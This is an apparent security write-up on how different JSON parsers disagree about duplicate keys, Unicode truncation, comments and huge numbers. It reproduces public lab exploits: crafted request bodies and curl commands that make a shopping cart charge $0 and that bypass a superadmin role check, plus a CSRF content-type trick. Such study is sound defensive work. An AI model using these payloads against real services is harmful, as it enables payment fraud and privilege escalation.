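JSON Parsing Differences: A Risk Study

Introduction

This article shares one technique: turning differences in how JSON is parsed into security issues.

Prerequisite: several components in the system parse the same JSON differently.

Starting with JSON

JSON (JavaScript Object Notation) is a lightweight data interchange format that is easy for humans to read and write and easy for machines to parse and generate. It is widely used for data transfer, especially between clients and servers.

It originated in JavaScript, but over time it has become a general-purpose data format supported by most programming languages.

An example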

{
  "name": "John Doe",
  "age": 30,
  "isEmployee": true,
  "address": {
    "street": "123 Main St",
    "city": "New York",
    "zipcode": "10001"
  },
  "phoneNumbers": ["123-456-7890", "987-654-3210"]
}

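JSON parsing security issues

Before getting started, here are two conclusions:

The same JSON document can be parsed into different values across microservices, which leads to a range of potential security risks.
Because of the first point, the more JSON parsers a system contains, the more potential security issues it has.

Where the problem comes from

As with most problems, nothing works well without rules: JSON parsing differences lead to security issues precisely because no specification strictly defines every aspect of the format.

The official JSON RFC leaves some details loosely specified, such as how to handle duplicate keys and how to represent numbers. The RFC does include caveats about interoperability, but most users of JSON parsers are not aware of them.

Besides the official RFC, parsers follow a number of other specifications, including: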

IETF JSON RFC (8259 and prior): official Internet Engineering Task Force (IETF) specification.
ECMAScript Standard: Changes to JSON are released in lockstep with RFC releases, and the standard refers to the RFC for guidance on JSON. However, non-spec conveniences provided by the JavaScript interpreter, such as quoteless strings and comments, have inspired many parsers.
JSON5: This superset specification augments the official specification by explicitly adding convenience features (e.g., comments, alternative quotes, quoteless strings, trailing commas).
HJSON: HJSON is similar to JSON5 in spirit with different design choices.
And so on.

Duplicate key handling (precedence)

obj = {"a": 1, "a": 2}

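In the object above, is the value of a 1 or 2?

See how IETF JSON RFC (8259) addresses this: https://datatracker.ietf.org/doc/html/rfc8259

The RFC says that names within an object SHOULD be unique, and that when they are not, the behavior of software receiving the object is unpredictable. In short, there is no mandatory rule.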
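To make the ambiguity concrete, here is a minimal sketch using only Python's standard json module. It shows that the default parse silently keeps one value, while object_pairs_hook exposes both pairs as they appear in the document.

```python
import json

raw = '{"a": 1, "a": 2}'

# The standard json module silently keeps the last occurrence of a key.
last_wins = json.loads(raw)

# object_pairs_hook receives every key/value pair in document order,
# so the duplicate is still visible here.
pairs = json.loads(raw, object_pairs_hook=list)

print(last_wins)  # {'a': 2}
print(pairs)      # [('a', 1), ('a', 2)]
```

Other parsers are free to keep the first value instead, which is the difference the lab below relies on.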

Reproduction: https://github.com/BishopFox/json-interop-vuln-labs/tree/master/lab1

We use this lab to analyze the problem.

Start the containers

docker-compose up -d

Handling in Python (Flask with jsonschema)

import jsonschema
import requests
import json



test_json = {
    "orderId": 10,
        "cart": [
        {
            "id": 0,
            "qty": 5
        },
        {
            "id": 1,
            "qty": -1,
            "qty": 1
        }
    ]
}


test_json2 = {
    "orderId": 10,
        "cart": [
        {
            "id": 0,
            "qty": 5
        },
        {
            "id": -10,
            "qty": 1
        }
    ]
}

schema = {
    "type": "object",
    "properties": {
        "orderId": {
            "type": "number",
            "maximum": 10,
        },
        "cart": {
            "type": "array",
            "items": {
                "type": "object",
                "properties": {
                    "id": {
                        "type": "number",
                        "minimum": 0,
                        "exclusiveMaximum": 9 #len(productDB)-1
                    },
                    "qty": {
                        "type": "integer",
                        "minimum": 1
                    },
                },
                "required": ["id", "qty"],
            }
        }
    },
    "required": ["orderId", "cart"],
}


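# validate() returns None on success and raises ValidationError on failure.
res = jsonschema.validate(instance=test_json, schema=schema)
print(res)
# The duplicate "qty" key has already collapsed to its last value, 1.
print(test_json)

# test_json2 contains id -10, which violates "minimum": 0,
# so this call raises jsonschema.ValidationError.
res2 = jsonschema.validate(instance=test_json2, schema=schema)
print(res2)
print(test_json2)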

As shown, Python keeps the last occurrence of a duplicated key.

Handling in Go

package main

import (
    "fmt"
    "github.com/buger/jsonparser"
)

func main() {
    jsonData := []byte(`{
        "orderId": 10,
            "cart": [
            {
                "id": 0,
                "qty": 5
            },
            {
                "id": 1,
                "qty": -1,
                "qty": 1
            }
        ]
    }`)

    // fmt.Println("data:", jsonData)

    jsonparser.ArrayEach(
        jsonData,
        func(value []byte, dataType jsonparser.ValueType, offset int, err error) {
            id, _ := jsonparser.GetInt(value, "id")
            qty, _ := jsonparser.GetInt(value, "qty")
            fmt.Println("id:", id)
            fmt.Println("qty:", qty)
        },
    "cart")

}

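As shown, Go's jsonparser keeps the first occurrence of a duplicated key.
The lab1 write-up exploits exactly this: the Python Flask service acts as a validating proxy, while the actual calculation logic lives in the Go service.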

curl 192.168.56.130:5000/cart/checkout -H "Content-Type: application/json" -d @lab1_req.json

# lab1_req.json
{
    "orderId": 10,
        "cart": [
        {
            "id": 0,
            "qty": 5
        },
        {
            "id": 1,
            "qty": -1,
            "qty": 1
        }
    ]
}

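The Flask layer validates qty = 1 for item 1, but the Go service reads qty = -1, so the amount charged is 100*5-200 = 300.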
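The mismatch between the two layers can be simulated in a single process. This is only a sketch: the PRICES table is hypothetical and chosen to match the arithmetic above, and first_wins is an illustrative stand-in for the Go parser's behavior, not the lab's code.

```python
import json

# Hypothetical unit prices, chosen to match the 100*5-200 arithmetic.
PRICES = {0: 100, 1: 200}

def first_wins(pairs):
    """Build a dict that keeps the first occurrence of each key."""
    result = {}
    for key, value in pairs:
        result.setdefault(key, value)
    return result

def total(order):
    """Sum price * quantity over the cart."""
    return sum(PRICES[item["id"]] * item["qty"] for item in order["cart"])

raw = '{"orderId": 10, "cart": [{"id": 0, "qty": 5}, {"id": 1, "qty": -1, "qty": 1}]}'

validator_view = json.loads(raw)                              # last key wins
backend_view = json.loads(raw, object_pairs_hook=first_wins)  # first key wins

print(validator_view["cart"][1]["qty"])  # 1
print(backend_view["cart"][1]["qty"])    # -1
print(total(validator_view))             # 700
print(total(backend_view))               # 300
```

The validator approves a 700 order while the backend charges 300 for the same bytes.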

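Character truncation and comments (precedence)

Character truncation and comments can also cause parsers to disagree, which widens the set of parsers affected by duplicate-key precedence.

Character truncation

When a particular character appears in a string, some JSON parsing libraries truncate the string at that point while others do not. As a result, keys that look different can be interpreted as duplicates.

Example payloads: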

{"test": 1, "test\[raw \x0d byte]": 2} 
{"test": 1, "test\ud800": 2}
{"test": 1, "test"": 2}
{"test": 1, "te\st": 2}

Unicode encoding and decoding behavior in Python 2.x

import json
import ujson
# Serialization into illegal unicode.
u"asdf\ud800".encode("utf-8")

# Reserializing illegal unicode
json.dumps({"test": "asdf\xed\xa0\x80"})

# Third-party library ujson handling the duplicate key
ujson.loads('{"test": 1, "test\\ud800": 2}')

Unicode encoding and decoding behavior in Python 3.x
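For comparison, a short sketch of how the standard library in Python 3 treats the same lone surrogate. It uses only the built-in json module, and ujson is left out on purpose since its behavior varies by version.

```python
import json

parsed = json.loads('{"test": 1, "test\\ud800": 2}')

# The lone surrogate is kept in the key, so the two keys stay distinct.
print(len(parsed))  # 2

# Encoding the key to UTF-8 is refused instead of silently truncated.
try:
    "test\ud800".encode("utf-8")
    encoded = True
except UnicodeEncodeError:
    encoded = False
print(encoded)  # False

# Re-serialization escapes the surrogate rather than dropping it.
reserialized = json.dumps(parsed)
print(reserialized)
```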

In summary, Python 2 leaves room for a bypass in this situation.

Reproducing lab2

https://github.com/BishopFox/json-interop-vuln-labs/tree/master/lab2

Creating an admin user through /user/create, the normal business flow:

{
    "user": "adminUser",
    "roles": ["superadmin"]
}

Creating an ordinary role succeeds

{"name": "simple"}

Bypass through Unicode parsing with superadmin\ud888

[root@localhost lab2]# cat role2.json 
{"name": "superadmin\ud888"}

Create exampleUser with the role superadmin\ud888

[root@localhost lab2]# curl localhost:5002/user/create -H "Content-Type: application/json" -d @user2.json
{"OK":"Created user 'exampleUser'"}

[root@localhost lab2]# cat user2.json 
{
    "user": "exampleUser",
    "roles": ["superadmin\ud888"]
}

Verification
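The effect can be checked in isolation with a small sketch. It does not talk to the lab services: RESERVED_ROLES, is_reserved, and lossy_store are hypothetical names, and lossy_store only assumes that some downstream layer drops code points it cannot encode.

```python
import json

RESERVED_ROLES = {"superadmin"}

def is_reserved(role):
    """Exact-match check, as a validation layer might perform."""
    return role in RESERVED_ROLES

def lossy_store(role):
    """Assumed downstream behavior: code points that cannot be encoded are dropped."""
    return role.encode("utf-8", errors="ignore").decode("utf-8")

role = json.loads('"superadmin\\ud888"')

print(is_reserved(role))               # False
print(lossy_store(role))               # superadmin
print(is_reserved(lossy_store(role)))  # True
```

The role passes the check as a distinct string and only becomes superadmin after the lossy step.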

Comment truncation

The following examples are collected from the referenced research:

obj = {"description": "Duplicate with comments", "test": 2, "extra": /*, "test": 1, "extra2": */}

Different JSON SDKs parse it as follows

GoLang's GoJay library

description = "Duplicate with comments"
test = 2
extra = ""

Java's JSON-iterator library

description = "Duplicate with comments"
extra = "/*"
extra2 = "*/"
test = 1

obj = {"description": "Comment support", "test": 1, "extra": "a"/*, "test": 2, "extra2": "b"*/}

Different JSON SDKs parse it as follows

Java’s GSON library

{"description":"Comment support","test":1,"extra":"a"}

Ruby’s simdjson library

{"description":"Comment support","test":2,"extra":"a","extra2":"b"}
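As a point of comparison, a strict parser should reject both payloads outright. The sketch below checks this with Python's standard json module; accepts is a hypothetical helper name.

```python
import json

payloads = [
    '{"description": "Duplicate with comments", "test": 2, "extra": /*, "test": 1, "extra2": */}',
    '{"description": "Comment support", "test": 1, "extra": "a"/*, "test": 2, "extra2": "b"*/}',
]

def accepts(raw):
    """Return True if the standard json module parses the input."""
    try:
        json.loads(raw)
        return True
    except json.JSONDecodeError:
        return False

results = [accepts(p) for p in payloads]
print(results)  # [False, False]
```

A component that rejects the document and one that accepts it can never agree on the value of test, so comment support is itself a parsing difference.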

JSON serialization risks

Serialization also needs care around duplicate keys, for example:

# Java's JSON-iterator

# input
obj = {"test": 1, "test": 2}

# output
obj["test"] // 1
obj.toString() // {"test": 2}

# C++’s rapidjson

# input
obj = {"test": 1, "test": 2}

# output
obj["test"] // 2
obj.toString() // {"test": 1, "test": 2}
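One way to avoid passing ambiguous bytes downstream is to forward the re-serialized form of what was validated rather than the original body. A minimal sketch with Python's standard json module, where forward_body is a hypothetical helper:

```python
import json

raw = '{"test": 1, "test": 2}'

parsed = json.loads(raw)
canonical = json.dumps(parsed)

print(parsed["test"])  # 2
print(canonical)       # {"test": 2}

def forward_body(raw_body):
    """Parse the input, then emit the parsed value instead of the original bytes."""
    return json.dumps(json.loads(raw_body))
```

This only helps when the serializer emits exactly what the accessor returned, which the two libraries above show is not guaranteed.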

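Parsing integers and floats

First, the official position: the RFC explicitly allows implementations to set limits on the range and precision of the numbers they accept, so number parsing can be inconsistent across parsers.

Large numbers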

# input
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999

# possible outputs
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
9.999999999999999e95
1E+96
0
9223372036854775807
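Several of these outputs can be reproduced from one input in Python. The sketch below uses the standard json module; the float and saturating variants only imitate what a float64-only or int64-only decoder might do, they are not taken from any specific library.

```python
import json

raw = "9" * 96  # the 96-digit input shown above
INT64_MAX = 2**63 - 1

exact = json.loads(raw)                       # arbitrary-precision int
as_double = json.loads(raw, parse_int=float)  # what a float64-only decoder keeps
saturated = min(exact, INT64_MAX)             # what a saturating int64 decoder keeps

print(exact == 10**96 - 1)  # True
print(as_double)            # 1e+96
print(saturated)            # 9223372036854775807
```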

For example:

Python 3 demo

[root@localhost json-interop-vuln-labs_test]# python3 python_json.py 
/usr/local/lib/python3.8/site-packages/urllib3/__init__.py:35: NotOpenSSLWarning: urllib3 v2 only supports OpenSSL 1.1.1+, currently the 'ssl' module is compiled with 'LibreSSL 3.9.0'. See: https://github.com/urllib3/urllib3/issues/3020
  warnings.warn(
None
{'orderId': 10, 'cart': [{'id': 0, 'qty': 5}, {'id': 1, 'qty': 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999}]}

Python 3 handles the large number correctly

Go demo

jsonData := []byte(`{
        "orderId": 10,
            "cart": [
            {
                "id": 0,
                "qty": 5
            },
            {
                "id": 1,
                "qty": 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
            }
        ]
    }`)

Go parses the large number as 0

A second solution to lab1

[root@localhost lab1]# cat lab1_alt_req.json 
{
        "orderId": 10,
        "cart": [
        {
            "id": 8,
            "qty": 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
        }
    ]
}

curl 192.168.56.130:5000/cart/checkout -H "Content-Type: application/json" -d @lab1_alt_req.json

>>>
[root@localhost lab1]# curl 192.168.56.130:5000/cart/checkout -H "Content-Type: application/json" -d @lab1_alt_req.json
Receipt:
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999x $100 E-Gift Card @ $100/unit

Total Charged: $0

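One last special case: numbers large enough to become infinity

What the RFC says: positive and negative infinity, along with NaN (not a number), are not supported by the official RFC.

Again, the RFC does not mandate how implementations should handle such values, so results like the following are possible: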

{"description":"Big float","test":1.0e4096}
{"description":"Big float","test":Infinity}
{"description":"Big float","test":"+Infinity"}
{"description":"Big float","test":null}
{"description":"Big float","test":Inf}
{"description":"Big float","test":3.0e14159265358979323846}
{"description":"Big float","test":9.218868437227405E+18}
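Python's standard json module is one parser that produces infinity here. The sketch below shows the default behavior and two standard-library switches that tighten it; reject_constant is a hypothetical helper name.

```python
import json
import math

# An exponent too large for a double overflows to infinity.
overflow = json.loads('{"test": 1.0e4096}')["test"]
print(math.isinf(overflow))  # True

# The bare Infinity literal is also accepted by default.
literal = json.loads('{"test": Infinity}')["test"]
print(math.isinf(literal))  # True

def reject_constant(name):
    """Refuse NaN, Infinity, and -Infinity while parsing."""
    raise ValueError(f"non-standard JSON constant: {name}")

try:
    json.loads('{"test": Infinity}', parse_constant=reject_constant)
    rejected = False
except ValueError:
    rejected = True
print(rejected)  # True

# Serialization can be made strict as well.
try:
    json.dumps({"test": overflow}, allow_nan=False)
    dumped = True
except ValueError:
    dumped = False
print(dumped)  # False
```

Note that parse_constant does not catch the 1.0e4096 overflow, so a range check on parsed floats is still needed.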

# php demo
<?php
echo 0 == 1.0e4096 ? "True": "False" . "\n"; # False
echo 0 == "Infinity" ? "True": "False" . "\n"; # True on PHP 7 and earlier; PHP 8 compares as strings and prints False
?>

Permissive JSON parsing

In short, some JSON parsers strictly enforce the RFC grammar, while others accept "odd" characters.

In CSRF attacks

POST /update_XXX HTTP/1.1
...
Content-Type: application/x-www-form-urlencoded

{"testlaitie233": 1}=

This permissiveness is also why some payloads like this one work.
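The difference between a strict and a lenient parse of that body can be sketched with Python's standard json module. Here raw_decode stands in for a lenient parser that stops after the first JSON value and ignores what follows; it is an illustration, not the behavior of any particular server.

```python
import json

body = '{"testlaitie233": 1}='

# A strict parse rejects the trailing "=".
try:
    json.loads(body)
    strict_ok = True
except json.JSONDecodeError:
    strict_ok = False

# raw_decode parses the first JSON value and reports where it stopped,
# which mimics a lenient parser that ignores trailing bytes.
obj, end = json.JSONDecoder().raw_decode(body)

print(strict_ok)   # False
print(obj)         # {'testlaitie233': 1}
print(body[end:])  # =
```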

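This area is a good target for fuzz testing.

Defense

Defense splits into two perspectives: JSON SDK developers and ordinary developers who use those SDKs.

JSON SDK developers: follow the RFC strictly and handle the abnormal cases described in this article.
Ordinary developers (consumers): inventory every parser in the architecture and enforce strict JSON Schema validation for abnormal input.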
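On the consumer side, part of this strictness can be applied at parse time, before schema validation runs. The following is a sketch built on hooks of Python's standard json module; strict_loads and its helpers are hypothetical names, and the int64 bound is an assumption about what downstream services can represent.

```python
import json

INT64_MIN, INT64_MAX = -(2**63), 2**63 - 1

def _no_duplicates(pairs):
    """Reject objects that repeat a key."""
    result = {}
    for key, value in pairs:
        if key in result:
            raise ValueError(f"duplicate key: {key!r}")
        result[key] = value
    return result

def _bounded_int(text):
    """Reject integers that an int64-based parser could not hold."""
    value = int(text)
    if not INT64_MIN <= value <= INT64_MAX:
        raise ValueError(f"integer out of int64 range: {text}")
    return value

def _no_constants(name):
    """Reject NaN, Infinity, and -Infinity."""
    raise ValueError(f"non-standard constant: {name}")

def strict_loads(raw):
    """Parse JSON, refusing inputs that other parsers may read differently."""
    return json.loads(
        raw,
        object_pairs_hook=_no_duplicates,
        parse_int=_bounded_int,
        parse_constant=_no_constants,
    )

def is_accepted(raw):
    """Return True if strict_loads parses the input without error."""
    try:
        strict_loads(raw)
        return True
    except ValueError:
        return False

print(is_accepted('{"id": 1, "qty": 1}'))             # True
print(is_accepted('{"id": 1, "qty": -1, "qty": 1}'))  # False
print(is_accepted('{"qty": ' + "9" * 96 + '}'))       # False
print(is_accepted('{"qty": NaN}'))                    # False
```

Rejecting ambiguous input is safer than picking a side, because no choice of precedence can match every other parser in the chain.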

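Closing thoughts

This article described a class of potential security issues caused by JSON parsing. In real environments, take the time to analyze how the JSON parsers in use differ and where they agree.

Many historical CVEs are rooted in the same principle.

References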

https://bishopfox.com/blog/json-interoperability-vulnerabilities

https://portswigger.net/daily-swig/research-how-json-parsers-can-create-security-risks-when-it-comes-to-interoperability

https://github.com/BishopFox/json-interop-vuln-labs/